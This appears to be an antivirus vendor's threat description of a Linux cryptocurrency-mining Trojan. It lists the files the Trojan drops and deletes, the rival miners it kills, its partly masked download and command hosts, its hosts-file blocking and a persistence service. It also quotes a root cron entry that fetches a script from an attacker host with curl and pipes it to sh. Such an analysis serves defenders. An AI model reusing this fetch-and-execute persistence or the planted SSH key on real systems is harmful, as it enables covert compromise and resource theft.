Trojan.Linux.MALXMR.UWEJC

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It connects to certain websites to send and receive information.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following files:

• /etc/rzx - contains the new file name of its miner
• /root/.ssh/authorized_keys - contains the attacker's SSH public-key

It creates the following folders:

• /root/.ssh

Other System Modifications

This Trojan deletes the following files:

• /tmp/ddg*
• /tmp/wnTKYg
• /tmp/qW3xT.2
• /tmp/ddgs.3013
• /tmp/ddgs.3012
• /tmp/2t3ik
• /tmp/root.sh
• /tmp/pools.txt
• /tmp/libapache
• /tmp/config.json
• /tmp/bashf
• /tmp/bashg
• /tmp/libapache
• /tmp/kworkerds
• /bin/kworkerds
• /bin/config.json
• /var/tmp/kworkerds
• /var/tmp/config.json
• /usr/local/lib/libjdk.so
• /tmp/.systemd-private-*
• /usr/lib/libiacpkmn.so.3
• /etc/init.d/nfstruncate
• /etc/init.d/ats
• /etc/zigw
• /tmp/zigw
• /etc/zjgw

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

• wnTKYg
• ddg*
• stratum
• xmrig
• /var/tmp/java
• ddgs
• qW3xT
• t00ls.ru
• sustes
• Xbash
• hashfish
• .syslog
• xig
• systemctI
• tsm
• zigw
• zjgw
• Processes that use the following ports:
  • 3333
  • 4444
  • 5555
  • 6666
  • 7777
  • 3347
  • 14444
  • 14443

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

• http://w.{BLOCKED}i.xyz:43768/pvds
• http://w.{BLOCKED}i.xyz:43768/httpdz
• http://w.{BLOCKED}i.xyz:43768/migration
• http://w.{BLOCKED}i.xyz:43768/rm
• http://w.{BLOCKED}i.xyz:43768/crontab.sh

It saves the files it downloads using the following names:

• /etc/{random characters} - detected as Coinminer_MALXMR.SMGH2-ELF64
• /etc/httpdz - detected as Backdoor.Linux.POPDZ.A
• /etc/migrations - detected as Trojan.Linux.WATCHMINE.A
• /usr/bin/rm - detected as Trojan.SH.FAKERM.A

Other Details

This Trojan connects to the following website to send and receive information:

• http://w.{BLOCKED}i.xyz:43768/
• http://w.{BLOCKED}n.xyz:43768/
• http://w.{BLOCKED}n.com:43768/

It does the following:

• It blocks all outgoing SSH connections on the following ports:
  • 3333
  • 5555
  • 7777
  • 9999
  • 14444
• It modifies the system's HOSTS files to prevent users from accessing the following websites:
  • mine.{BLOCKED}pool.com
  • xmr.{BLOCKED}-pool.fr
  • {BLOCKED}hash.com
  • {BLOCKED}l.eu
  • pool.{BLOCKED}r.com
  • pool.{BLOCKED}r.cn
  • xmr.{BLOCKED}o.be
  • stratum.{BLOCKED}r.com
  • pool.monero.{BLOCKED}ult.pro
  • xmr-us.{BLOCKED}va.cc
  • de.{BLOCKED}mr.com
  • de2.{BLOCKED}mr.com
  • fr.{BLOCKED}r.com
  • de.{BLOCKED}r.com
  • ca.{BLOCKED}r.com
  • sg.{BLOCKED}r.com
  • xmr.{BLOCKED}anpool.com
  • xmr-usa.{BLOCKED}ool.com
  • monero.{BLOCKED}s.pro
  • xmr.{BLOCKED}h.net
  • {BLOCKED}i.com
  • {BLOCKED}mr.ru
  • {BLOCKED}in.com
  • {BLOCKED}y.ru
  • {BLOCKED}ate.com
  • {BLOCKED}ra.in
• It creates the following service:
  • Service name: ats
    Description: service
    Task to be run: nohup /etc/initdz > /dev/null &
• It creates a root cronjob to enable automatic execution of crontab.sh every 12 minutes:
  • Path: /var/spool/cron/root
    Content: */12 * * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh